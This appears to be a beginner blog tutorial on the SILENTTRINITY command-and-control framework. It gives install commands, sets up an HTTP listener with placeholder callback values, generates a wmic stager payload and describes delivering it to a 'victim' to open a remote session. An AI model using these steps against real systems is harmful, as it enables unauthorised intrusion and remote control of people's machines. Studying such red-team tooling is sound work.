There are many tools, but, those written in python, are the ones to fall in love with, especially, SILENTTRINITY, with it, you can do several things. You will learn those in this publication, and best of all, you don’t require any previous knowledge, you just have to use it and you’ll learn.
The installation is very simple, unlike Windows, in Linux the installation of any application is very simple; just write some console commands and everything will be ready. Next, we have a list of commands that we will write in console with which we will install and start SILENTTRINITY.
apt install python3.7 python3.7-dev python3-pip git clone https://github.com/byt3bl33d3r/SILENTTRINITY cd SILENTTRINITY/Server python3.7 -m pip install -r requirements.txt python3.7 st.py
The command-line syntax of this tool is very similar to that of Metasploit or Empire, it’s also very intuitive; for example, let’s see what happens if we write the help command on the console.
We can easily configure an HTTP listener with the following commands:
listeners use http set BindIP callback_ip_here set Port callback_port_here start
With our listener running, we will choose the wmic stager and generate it for the active listener “http”:
stagers use wmic generate http
A wmic.xsl file with payload was generated in the Server directory, and we will deliver it via HTTP to the victim:
After the delivery and execution of the stager, we can see that a new session was opened on our server:
At this point we can play with several modules:
Summarising, we can say that SILENTTRINITY is a modern, asynchronous, multiplayer and multiserver C2 / post-exploitation framework driven by Python 3 and NETs DLR.
Some of the main features that distinguish SILENTTRINITY are:
- Multi-user and multi-server: support multi-user collaboration. In addition, the client can connect and control multiple Teamservers.
- Client and Teamserver integrated in Python 3.7: the latest and best features of the Python language are used; Asyncio’s intensive use provides ridiculous speeds.
- Updates and communication in real-time: the use of Websockets allow communication and updates in real-time between the Client and Teamserver.
- ECDHE encrypted C2 communication: SILENTTRINITY uses the ephemeral elliptic curve Diffie-Hellman key exchange to encrypt all C2 traffic between the Teamserver and its implant.
- Completely modular: listeners, modules, stages and C2 channels are completely modular, allowing operators to easily build their own.
- Extensive registration: each action is recorded in a file.
I invite you to continue reviewing the publications of our website I assure you that you will find many interesting topics that will expand your knowledge.